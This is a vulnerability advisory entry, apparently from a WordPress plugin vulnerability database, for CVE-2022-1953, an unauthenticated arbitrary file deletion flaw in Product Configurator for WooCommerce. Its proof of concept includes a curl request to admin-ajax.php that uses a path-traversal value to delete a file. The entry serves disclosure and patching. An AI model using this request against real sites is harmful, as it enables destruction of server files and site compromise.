Product Configurator for WooCommerce < 1.2.32 – Unauthenticated Arbitrary File Deletion | CVE 2022-1953 | Plugin Vulnerabilities

Description

The plugin suffers from an arbitrary file deletion vulnerability via an AJAX action, accessible to unauthenticated users, which accepts user input that is being used in a path and passed to unlink() without validation first

Proof of Concept

Create a dummy file on the WordPress host to delete (the file must be owned by the web user):
    echo '1' > /tmp/delete_me.txt && chown 'www-data:www-data' /tmp/delete_me.txt

Invoke the following curl command to delete the dummy file:
   curl 'http://127.0.0.1/wp-admin/admin-ajax.php' \
      --data 'action=mkl_pc_generate_config_image&data=../../../../../../tmp/delete_me.txt'

Verify the file has been deleted

Affects Plugins

product-configurator-for-woocommerce

Fixed in 1.2.32

References

CVE

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

b66d6682-edbc-435f-a73a-dced32a32770

Timeline

Publicly Published

2022-06-06 (about 1 years ago)

Added

2022-06-06 (about 1 years ago)

Last Updated

2023-03-08 (about 1 years ago)

Other

Published

Title

Published

2017-02-15

Title

Posts In Page < 1.3.0 - Directory Traversal

Published

2022-11-29

Title

Simple:Press < 6.8.1 - Admin+ Arbitrary File Update

Published

2022-11-30

Title

Easy WP SMTP < 1.5.2 - Admin+ Arbitrary File Access

Published

2022-12-12

Title

Wholesale Market for WooCommerce < 2.0.0 - Admin+ Arbitrary Log Download

Published

2021-04-13

Title

Media File Organizer <= 1.0.1 - Directory Traversal